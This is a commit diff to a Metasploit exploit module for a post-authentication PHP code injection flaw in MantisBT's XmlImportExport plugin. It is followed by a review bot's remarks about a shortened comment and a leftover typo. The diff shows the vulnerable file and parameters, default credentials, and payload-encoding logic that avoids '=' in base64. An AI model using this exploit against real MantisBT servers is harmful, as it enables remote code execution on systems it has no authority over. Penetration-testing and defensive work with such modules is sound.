update description and fix typos

bug/bundler_fix
Juan Escobar 2014-11-09 09:10:01 -05:00
parent 5d17637038
commit 9cce7643ab
1 changed files with 5 additions and 4 deletions


@ -15,8 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
'Description' => %q{
When importing data with the plugin, user input passed through the "description" field (and the "issuelink" attribute) of the uploaded XML file isn't properly sanitized before being used in a call to the preg_replace() function which uses the 'e' modifier.
This can be exploited to inject and execute arbitrary PHP code when the Import/Export plugin is installed.
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine.
},
'License' => MSF_LICENSE,
'Author' =>
@ -38,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '']),
OptString.new('TARGETURI', [ true, 'Base directory path', '']),
], self.class)
end
@ -57,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
# remove comments, line breaks and spaces of php_code
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
# clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
# clean b64 payload
while Rex::Text.encode_base64(payload_clean) =~ /=/
payload_clean = "#{ payload_clean } "
end
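Review bot: The replacement comment on the new side of the last hunk drops the only explanation of why the loop below appends spaces to `payload_clean`; "clean b64 payload" no longer tells a reader that the padding exists because the injected string cannot contain a `=` character, which is the constraint the old comment recorded (the quotes/apostrophes part presumably described the same injection context, though nothing in the hunk shows it). Keep the rationale with the loop, e.g. `# pad with spaces until the base64 form has no '=' padding (the injected string must not contain '=')`. The surrounding method starts outside the hunk, and the hunk's line count suggests a trailing line is not shown here. Separately, in the option hunk the context line `'Pasword to authenticate as'` still carries a typo that this typo-fixing commit leaves in place; `'Password to authenticate with'` would be the obvious correction.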